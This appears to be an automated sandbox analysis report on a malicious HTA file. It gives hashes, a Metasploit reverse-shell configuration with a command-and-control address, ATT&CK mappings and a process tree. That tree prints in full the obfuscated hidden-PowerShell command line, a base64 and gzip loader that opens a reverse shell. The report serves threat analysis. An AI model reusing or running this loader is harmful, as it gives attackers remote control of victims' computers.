Analysis

  • max time kernel
    135s
  • max time network
    104s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 01:19

General

  • Target

    5a053f4449623db14b37b34c6cc783b87d86a95baa7b258bcd9d42c1d023974e.hta

  • Size

    7KB

  • MD5

    568178389480e9f8368e66d811b105fe

  • SHA1

    34c19d4b6bc99440b30ee9922a566ded9bd7a287

  • SHA256

    5a053f4449623db14b37b34c6cc783b87d86a95baa7b258bcd9d42c1d023974e

  • SHA512

    7bf3b91350ad635543cb92167d3e0b28d7d51164b8da040ea0740e672bfdad7d4242b25ba42b12a1c4cd266cbf44fa1ae6b8c34b01eea61ffa3687e8fd06e9ed

  • SSDEEP

    192:gn2jh1hqT2TsQL36ANDaqkvhYXMl9tKTsQGF6hd9d:gn2jh1hszMLBa5vhB94Tl1hd9d

Malware Config

Extracted

Family

metasploit

Version

windows/shell_reverse_tcp

C2

144.76.219.54:8000

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5a053f4449623db14b37b34c6cc783b87d86a95baa7b258bcd9d42c1d023974e.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1804
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEAQwBpAHYAZwBtAFUAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBYAHEAbgAvAHcAYQBvAHMAMgBaAFkASQBiACsARwBhAEoAbABLAGwAcwAzAGsASgBKAHAAaABBAEgARQB5AEEAbwB0AE4AaQByADgAMwBDADIAawB2AHQAZABYAGoAcAA5AGIALwBmAEwATgBnAGgAdgBTAFIAMwB2AFoATwA2AEUAcwBLAGUAbgBaAG0AZABmAGUAYQBaAEcAZgB0AHAANQBIAEwAQwBJAGkAawBjAGQANgBSAHYANwA5ADkASgAyAGUAcQBqAEcASQBXAFMASwBzAGUAVABmAHQAYwB2AFMASABMAHEATgBiAFQAVAByAHMAeAA2ADAAbQBkAEoAbgBlAHIAcgBkAFkATwBGAGkARQBTAHoAcQA2AHQANgBHAHMAYwA0ADQAcwBmADMAJwAnACsAJwAnADQAagBYAG0AZQBwAEwAZwBjAEUANABKAFQAbABSAE4AKwBsAE0AYQBMAFgAQwBNAHoAMgA3AG4AUwArAHgAeQA2AFoAcwBrAC8AMQBHADgAcABtAHkATwBhAEsAYQAyAHEAeQBOADMAZwBhAFUAegB7ADAAfQBmAEwARQBYAHAAZQA1AFMATQBSAFYAdABOAGUAJwAnACsAJwAnAFUAYwBGAFgANQA4AGsAWABSAHAAbQBlAFYAVwBiAEgANQBOAFUAVQAwAFUAUgBWADcAbAAzAEEAYwBGAGoAMQBLAEYAVQAzADYAcgBvAGsARAA3ADMAZAByAHIAQwBvAFcAYwBXAE8AVwBNAEoAOABYAFIAeQAnACcAKwAnACcAUQA2AHIAeABhAEgAVQBZAEoAOAAzAEEATgB2AGoAOQBqAEMAZgBNAEcAOABSAEkARwByAG4AQwA0AFQAWQA1ADcARwBrAGIAaQBUAGMASABKAFUAVQBSAFYANAA3AE0AZgBNADEAVAAwAHYAeABrAG0AaQBGAEsAUwBwAGMARAArAGQAegBYADUAWABwADkAbgBaAGQAMgBuAEUAUwBZAGkATABaAHMAUgB4AHoATgBZADIAagBoACsASgBpADUATgBpAEcAMABVAGUAeABYAGYAWQBuADQARwBWAHoAVwBNAFMAQgBUAE4ATgBBADcAVgBIAHQAcwBLAHEAJwAnACsAJwAnAEgASwBXAFUARgBxAFQALwA0AGsAYgB0ADQAVQAyAE8AMwBNADgAYQBxAGMAKwBOAFEASwB2AHsAMAB9AFkANgAwAEEAQwBYADEAeABTADQAdAA1AEsAYwBWAEgATwArAFcAVgBNAEkAOABVADAARwBCAGwATgBBAEQAdwB2AGcAdgA4AC8ASgB3ADYATABKAHkALwBRAHAAMgBUAEkARgAvAFQAdwB3ADYARwBnAE4AVQArAFMAOABqAEIAOQByAE4AVQBMAGsAZwBXAEgASQA0ADQAaQAzAGYAdwBLAHQALwBIAEsAZABaAG0AVAAzAEIATABjAG4ASwB7ADAAfQBDAGoALwByAHIASgBKAGIAZwBsADIANABCAE0ASABVAFkAYwBTAGIAbgBjAHgALwB5AEwAdwBjAEoAYwB7ADEAfQBvAEwANwBUAGUASgBuAEkARAArAHkAVABDAGoAVgAyAEUAUQB7ADEAfQBMAG0AWABGAFYAZgB5AHcAagAyAEsAVAA0AEEAVQBzAHoAVgBlAGgAQwBnAHEAbQBRAGIAMgBHAHQAZwBpAGcAewAwAH0ARQBCAGMAcQBDAEcAQwAvAE0AbQBpAEgAaABUADcAWgBHAFMAcQBpAEgAWQA5ADIARgByAEMAWQBRACcAJwArACcAJwBGAFMAUgBjACsAegBHAFkAWQArAEoAVQB4AFkAdwBzAEgAQQBKADQAeAAzAGQAZwBxAHsAMQB9AHgARABoAGUAQgBjAE8AJwAnACsAJwAnADYAewAxAH0ASwBYAFgANgA2AGUAQQBjAGwAcABVADUAUgBrAGgAUwBrAGYAZwBvAGwANgBoAFkAawBHAHkATwBLAHYAWQBLACcAJwArACcAJwBrAFIAdwBuAEoAdAB2AFMAVQBzADgATwBqAGMAZwByAFgAUwBpAGsAbgBMAGsAcAA0ADcAbQA2AG0ALwBSADMAewAwAH0ANwBOAHcANgBpAHgASQBlAHAAeQA3AGsARgBUAEMANAB0ADkAZgBZAEoAWQBnAEsAUwBBAHAAUwBtADMAagBZADIATgBrAGsAeQBNADkAWABYAGcAVwBrAGoAaQBpAEYAJwAnACsAJwAnADQAZwBGAHsAMAB9AGoANQBBAFEAawBBAGcAZwBiAEMANwBZAEUAawBPAG8AZwBoAGwAYQAwAGMAYgBjAEQATgBjAFUAaAA2AEIAeQBhAEIAawB0AGkAZwBKAG8ARQBGAG0ARgBIAE4AaQBGAEEAewAxAH0AdwBwAGIAdwBXAGEAMQAnACcAKwAnACcAOABLAFIAKwBBAEsAYQBIAEoATgBuAFkAVQBLACsAYgBjAHAANABRAFgASgBJAHoASwBFAEQAQwBaAGoARAA1AGYAKwBKADQAVwBYAGoATwBRAFoAVABqADMARwBXAEgAVABXAHYAcwBLAG0AeAA0ADYASQBHAFoATwBJAEsAawBtAFkAQQBIAGUAQwBJAE8AVQBEAFIAaQBsAGwAbwBvAEEAUgAvAHIAQgAyADcAagB7ADAAfQBxAGgAZABFAHYAcQBPAHEAeQB4AEcAVgBIAEwATgBWAGEAawBvAG0AOQBJAHgAYgBUAGcATgB5AFQAbgBKAG0AdABjAGUARABlAGQAWgBiAHMAVQAnACcAKwAnACcATgA3AFkATABYAHoAYwBUADAAMgByADMARwA0AE4AMgB7ADEAfQAvAGIAWQBzAFoAMABhAHQANQBzAG0AdgArAG0AYgAzAEcAbwArAEwASgBlADIAMwAnACcAKwAnACcAcgA0AGIAagB2AG4ARQAnACcAKwAnACcAMQBOAHYAMwBwAEwAdwBhADEALwBiAHIARAB0AG4AYgBYAGQAMABiAGIAMABzAGYAOQA4AFoAKwBVAHoAYQAyACsAMgBYAGcAKwBlAE8ARwA3AHcAYwBYAHYAbgAxAFgAKwBhADEARgB7ADEAfQBxAHsAMAB9ADYAdwBDAGgAWABVAGIAZgBSAFQATABzAGoAWQAnACcAKwAnACcAMgBPAFUAYQAnACcAKwAnACcAMABtAFQAYgBOAG8ARABNAGgAeQBzAE8AaQAwACsASAB6AHMAVQBEAGYAMQBTADgARgBDADUAUgBHAFQAYgBqAFoAZABPAGgAVgBsADcAVQA5AGUAdgBGACsAZgB7ADEAfQB2AHsAMQB9AE0ANwAxAHcAdgBMACcAJwArACcAJwAyADQAMwBiAHAAYwB0AFIAYgBhAFUAMwBkAGIAMABlAE4AWgAyAFcAdwBXADcARwBSAHEAegAzAFMAOAA2AHcAWgBRAHkARwBUAFcATQB3AEEATgBuAEgAbwBPAFQAWABRAEUAYQByAHIASQBVADYAaABsAFgAZABUADUAZwBlADYAewAwAH0ANwBBAGoARQBLADAATQBFAFoATwBsAFUAegBXAEQAMwBjAEwAOABOAFcAQwBFAEsAeABTAHsAMQB9AFcAWgA2AGUATQBzACsAZABVAGYARQBlAFMAdwA1ADYATAByAEgASgAzAHEAOQBVADYAdAA0AEQAOAA2ACsAWABVAFcATAB6AHMAUgBKAHsAMQB9ADUAZQBUAHgARwB0ADIAJwAnACsAJwAnAEcAaAB0AEQASAAxAGUAYQBIAGEATgB4AHIAVABmAHYAaABzAHsAMAB9AFcAWgBPAFMAcwBKAHEATgA3AE8AaABrAE4ASwB4AE8ARwAzAFUAMQBwAEEAVAA0AEkATgBtADYAZAAxAGIAeABrAFgAUQBmAG0AWQBsAHMASgA0AEsAeQBMAGcALwArAFEAaABIAFIAZQA5AFUAcQBYAHcAMAA5AEcAdABMAGsASgArAG8AKwBCAE4AeABoAGQAMwBHADEANwB7ADEAfQAzAG0AVgA2AGMATgBTAHkAJwAnACsAJwAnAGYAawBBAHEAWgA0AE8AUwBjAFQAewAwAH0AcQB6AE0ANQB0AFMAcQArAGEASQBqAHYAMwA4AG4AegBoADMAMwB2AFcAYwByAGYANgB2AFkAVwBpAHAATQBGAG8AawBBAEYAYQBPAFIANQBSAGIAWgBZADMATQBwAGEAYwA1ADgAUgBZAGEARwBxAFkAcgBxAHYAYwBCAHgAaABDACcAJwArACcAJwBoAE0AUgBaAG0AWgBPAFkANQAxAFMANQBvAHEANQBJAEgAbwA0AGoASwBUAGoAbwBCAEIAegBhADIAZwBlAGcAbgByAHQAUwBaAE8AZQBGAEwAWABUAHcATQBoAEYAVgAxAGMAVABpAEIARQBxAGcANwBqAEYATABvADQAQwB2AGkAaQBVAHQAKwBmAGwATQB2AFQANQA4AHIAWgBjAE8AMQBUAEEAegA5ACsAcgB6AHQAWQA3AFYAUgBiAEYAQwB7ADAAfQBZAEgAVwBJADYAZQA2AGMARQB6AE8AQwBPACcAJwArACcAJwArAHAASwBxAC8ASABDAGYANABGAE8ARABRAGwATgA1AEUANgBpADMAUQA0AE8AUQBWAHQAQgBEAG8AYQBjAGYAQwBGAHQAQQBaAGoATgBIAG4AdwBHAFcAMwBlAHEATABCAEMAVABjAEEAcgBBAEwAWABuAG8AcAB2AGcAQQBNADcAdwB7ADAAfQA0AE0AZgA1AFYAawBMAG0AYgBrADgANQBrAHIAcAB5ADEAagAvAGsAcwBKAGsANwBXAG4AQgBmAHgANQAvADAASwBZAGsAKwB3AGYAZABuACsASwBSAE8AWABDAEUAWgB3AFgANABoADgARgB6AHoAcgA3AHIAdwBOAGcAaABBAGcASABSAFIAdgA2AEwATQBYAEgAMABmADgAcQBEAGwAbQBOAHsAMAB9AE0AewAxAH0AdgB5AEEAMwBVAGcASgA4AHQAOABUAEYAOABtAC8ASwB6AEgAbgB4AGcASABSAHIAOQBYADAASABoAFMATQB7ADEAfQBFAEMAdwBBAEEAJwAnACkALQBmACcAJwBQACcAJwAsACcAJwB1ACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2396
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIACivgmUCA7VWbW/aSBD+Xqn/waos2ZYIb+GaJlKls3kJJphAHEyAotNir83C2kvtdXjp9b/fLNghvSR3vZO6EsKenZmdfeaZGftp5HLCIikcd6Rv799J2eqjGIWSKseTftcvSHLqNbTTrsx60mdJnerrdYOFiESzq6t6Gsc44sf3'+'4jXmepLgcE4JTlRN+lMaLXCMz27nS+xy6Zsk/1G8pmyOaKa2qyN3gaUz{0}fLEXpe5SMRVtNe'+'UcFX58kXRpmeVWbH5NUU0URV7l3AcFj1KFU36rokD73drrCoWcWOWMJ8XRy'+'Q6rxaHUYJ83ANvj9jCfMG8RIGrnC4TY57GkbiTcHJUURV47MfM1T0vxkmiFKSpcD+dzX5Xp9nZd2nESYiLZsRxzNY2jh+Ji5NiG0UexXfYn4GVzWMSBTNNA7VHtsKq'+'HKWUFqT/4kbt4U2O3M8aqc+NQKv{0}Y60ACX1xS4t5KcVHO+WVMI8U0GBlNADwvgv8/Jw6LJy/Qp2TIF/Tww6GgNU+S8jB9rNULkgWHI44i3fwKt/HKdZmT3BLcnK{0}Cj/rrJJbgl24BMHUYcSbncx/yLwcJc{1}oL7TeJnID+yTCjV2EQ{1}LmXFVfywj2KT4AUszVehCgqmQb2Gtgig{0}EBcqCGC/MmiHhT7ZGSqiHY92FrCYQ'+'FSRc+zGYY+JUxYwsHAJ4x3dgq{1}xDheBcO'+'6{1}KXX66eAclpU5RkhSkfgol6hYkGyOKvYK'+'kRwnJtvSUs8OjcgrXSiknLkp47m6m/R3{0}7Nw6ixIepy7kFTC4t9fYJYgKSApSm3jY2NkkyM9XXgWkjiiF'+'4gF{0}j5AQkAggbC7YEkOoghla0cbcDNcUh6ByaBktigJoEFmFHNiFA{1}wpbwWa1'+'8KR+AKaHJNnYUK+bcp4QXJIzKEDCZjD5f+J4WXjOQZTj3GWHTWvsKmx46IGZOIKkmYAHeCIOUDRillooAR/rB27j{0}qhdEvqOqyxGVHLNVakom9IxbTgNyTnJmtceDedZbsU'+'N7YLXzcT02r3G4N2{1}/bYsZ0at5smv+mb3Go+LJe23'+'r4bjvnE'+'1Nv3pLwa1/brDtnbXd0bb0sf98Z+Uza2+2Xg+eOG7wcXvn1X+a1F{1}q{0}6wChXUbfRTLsjY'+'2OUa'+'0mTbNoDMhysOi0+HzsUDf1S8FC5RGTbjZdOhVl7U9evF+f{1}v{1}M71wvL'+'243bpctRbaU3db0eNZ2WwW7GRqz3S86wZQyGTWMwANnHoOTXQEarrIU6hlXdT5ge6{0}7AjEK0MEZOlUzWD3cL8NWCEKxS{1}WZ6eMs+dUfEeSw56LrHJ3q9U6t4D86+XUWLzsRJ{1}5eTxGt2'+'GhtDH1eaHaNxrTfvhs{0}WZOSsJqN7OhkNKxOG3U1pAT4INm6d1bxkXQfmYlsJ4KyLg/+QhHRe9UqXw09GtLkJ+o+BNxhd3G17{1}3mV6cNSy'+'fkAqZ4OScT{0}qzM5tSq+aIjv38nzh33vWcrf6vYWipMFokAFaOR5RbZY3Mpac58RYaGqYrqvcBxhC'+'hMRZmZOY51S5oq5IHo4jKTjoBBza2gegnrtSZOeFLXTwMhFV1cTiBEqg7jFLo4CviiUt+flMvT58rZcO1TAz9+rztY7VRbFC{0}YHWI6e6cEzOCO'+'+pKq/HCf4FODQlN5E6i3Q4OQVtBDoacfCFtAZjNHnwGW3eqLBCTcArALXnopvgAM7w{0}4Mf5VkLmbk85krpy1j/ksJk7WnBfx5/0KYk+wfdn+KROXCEZwX4h8Fzzr7rwNghAgHRRv6LMXH0f8qDlmN{0}M{1}vyA3UgJ8t8TF8m/KzHnxgHRr9X0HhSM{1}ECwAA')-f'P','u')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3600

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    1KB

    MD5

    4280e36a29fa31c01e4d8b2ba726a0d8

    SHA1

    c485c2c9ce0a99747b18d899b71dfa9a64dabe32

    SHA256

    e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

    SHA512

    494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    16KB

    MD5

    90d2ddc001b2ff0dcefd3e661cdee055

    SHA1

    5a9343b05280ab3e7900e01a9db035c89eb4d130

    SHA256

    e63490738cf81b7f4ebd56dab470b186b0e4fe2932d9fc7f331300ff3f1e93df

    SHA512

    c7e44c5b85d26349e7d690f1855b31b981f19c372c976e9e90f96e22db708dc062bccd8a2406ffd13f1b56ad692c3bcc30025681f519912cf1a732aee343ac6f

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c3is4cna.se0.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2396-4-0x00000000703F0000-0x0000000070BA0000-memory.dmp
    Filesize

    7.7MB

  • memory/2396-18-0x0000000005E00000-0x0000000005E1E000-memory.dmp
    Filesize

    120KB

  • memory/2396-5-0x0000000004EC0000-0x0000000004EE2000-memory.dmp
    Filesize

    136KB

  • memory/2396-6-0x0000000005780000-0x00000000057E6000-memory.dmp
    Filesize

    408KB

  • memory/2396-7-0x00000000057F0000-0x0000000005856000-memory.dmp
    Filesize

    408KB

  • memory/2396-3-0x00000000703F0000-0x0000000070BA0000-memory.dmp
    Filesize

    7.7MB

  • memory/2396-17-0x0000000005960000-0x0000000005CB4000-memory.dmp
    Filesize

    3.3MB

  • memory/2396-0-0x00000000703FE000-0x00000000703FF000-memory.dmp
    Filesize

    4KB

  • memory/2396-19-0x0000000005F30000-0x0000000005F7C000-memory.dmp
    Filesize

    304KB

  • memory/2396-20-0x0000000007750000-0x0000000007DCA000-memory.dmp
    Filesize

    6.5MB

  • memory/2396-21-0x0000000006320000-0x000000000633A000-memory.dmp
    Filesize

    104KB

  • memory/2396-2-0x0000000004FE0000-0x0000000005608000-memory.dmp
    Filesize

    6.2MB

  • memory/2396-25-0x00000000703F0000-0x0000000070BA0000-memory.dmp
    Filesize

    7.7MB

  • memory/2396-1-0x0000000002830000-0x0000000002866000-memory.dmp
    Filesize

    216KB

  • memory/3600-36-0x0000000006130000-0x0000000006131000-memory.dmp
    Filesize

    4KB